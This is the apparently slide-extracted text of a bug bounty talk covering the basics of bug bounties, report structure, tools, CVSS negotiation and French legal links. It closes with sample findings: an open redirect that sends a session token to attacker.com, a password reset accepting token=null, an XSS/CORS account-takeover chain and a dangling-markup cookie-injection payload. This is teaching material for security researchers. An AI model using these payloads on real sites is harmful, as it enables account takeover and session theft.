What is a bugbounty ?
What do reports look like?
How to start ?
Tools ?
How many $$$/month ?
Private or public program ?
Tax & law (french only) ?
How to get invited on private programs ?
Tips ? Memes ?
Become a millionaire ?
https://slides.com/xanhacks/bugbounty
@xanhacks - May 2023 for @Hack2g2
https://twitter.com/xanhacks
"Bug bounty is a cybersecurity initiative where organizations invite external researchers to find and report vulnerabilities in their systems in exchange for rewards."
Entity:
Hunter:
Hunters
Programs
...
Platforms
Hunters
Programs
1) Through a platform
2) Direct
Type of vulnerabilities:
Train web security:
https://portswigger.net/web-security/dashboard
Apprentice - Practitioner - Expert
The more you bugbounty, the more reflexes you'll have and the better you'll perform (instinct).
HackerOne Hacktivity - May 2023
📜 Description
Definition of the vulnerability
Proof of Concept
Screenshots, videos, links, requests, ...
🚧 Impacts
Impact of the vulnerability
🔐 Mitigations
How to fix the vulnerability
📚 References
References to OWASP, PortSwigger, Mozilla (MDN) ...
https://gitlab.com/xanhacks/web-pentest-reports/
Bugbounty:
CTF:
Pentest:
Platforms:
Advantages:
Learn
CTF / WebAcademy / Docs
Challenges
YWH Dojo, Intigrity XSS Challenges, ...
Start hunting
Public programs
Mindset
Read disclosed reports
What are the strategies?
A mix of humor and reality.
Run all web scanners on the targets
Copy paste the output in the report
Advantages
Disadvantages
Report on the borderline of OOS
Wait for a invitation / new program
Good program
Bad program
(not working, waiting for creds, bad scope, ...)
Quit
Hunt for a few hours, days
Advantages
Disadvantages
Hunt
Advantages
Disadvantages
Take notes
Automation ?
Bounty/rewards are mostly based on CVSS score and sometimes on business impacts. Choose the one that here more profitable for you, especially for Business Logic Errors vulnerabilities (e.g coupons code).
6.4 Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
This metric describes the conditions beyond the attacker’s control that must exist in order to exploit the vulnerability. As described below, such conditions may require the collection of more information about the target, or computational exceptions.
Importantly, the assessment of this metric excludes any requirements for user interaction in order to exploit the vulnerability (such conditions are captured in the User Interaction metric).
https://www.first.org/cvss/v3.1/specification-document#2-1-2-Attack-Complexity-AC
Don't report XSS with a simple alert(), look for the impact
?redirectURL=javascript:alert()
If the drop in CVSS score is not justified, don't hesitate to negotiate in the comments section
Lower impact due to:
3 possible results:
lost, won, in-between
The customer has the last word
Browser
Browser
PwnFox
Burp Pro (450€/year)
Scanner
Collaborator
Engagement tools
(CSRF PoC, Search sitemap, ...)
Docker image that contains all the tools you need + zsh history + wordlist:
https://github.com/xanhacks/xanhunt/
2 simple reports
VS
2 complicated reports
Reward: 800€
https://auth.victim.com/?app=example&redirect=https://attacker.com
https://attacker.com?session=XXXX
Log in
victim is logged?
POST /reset-password HTTP/1.1
Host: victim.com
...
username=toto&password=s3cr3t&password_repeat=s3cr3t&token=null
Log in with toto:s3cr3t
Reward: 2k€
Reward: ~1k2€ (@Mizu)
XSS on Login page
if user is auth => redirect to /
else => user execute XSS
Cookie domains scope to whole company
Cookie SameSite None
CORS : Origin reflected
CSRF Returned in /api/user
PoC - XSS on
sandbox-app.company.com (non logged)
fetch =>
app.company.com (logged)
Impact: ATO, Company Takeover, PII leak
Reward: ~880€ (@Mizu, @W00dy, @Perce)
Page like PHPInfo that display your HTTP request
Try: XSS in Query string (Url encode), Headers => Inject cookie
CSP script-src "self" => Bypass using Dangling Markup
Host: sub.example.co
User-Agent: toto
Cookie: a=XSS_PAYLOAD; ServerSide Cookies
...
Host: sub.example.co
User-Agent: toto
Cookie: a=<img src="https://example.com/?; ServerSide Cookies
https://github.com/noraj/BB-legal-FR
https://entreprendre.service-public.fr/vosdroits/F23961
https://www.service-public.fr/particuliers/vosdroits/F34328
Disadvantages
Benefits